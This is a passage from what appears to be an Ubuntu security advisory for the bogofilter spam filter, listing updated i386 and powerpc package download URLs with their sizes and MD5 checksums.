Size/MD5: 942 c4583a7d5ed114d1b23bdda9dff0b7db
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 237316 62e0348f1907d35d2a990a2c69543fb6
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 136590 acbfe94471e877359dc0e910d9be52eb
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_i386.deb
Size/MD5: 944 58e0b7482f9bc1a885940bfbf5d4c2ff
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 272064 05edb162837021bbcde1d6a3c7b5f1b4
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 136574 404fc07951bb7e614a55f15f6be9460c
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_powerpc.deb
Size/MD5: 946 a4fefa7122015cad56364bb27e29baeb
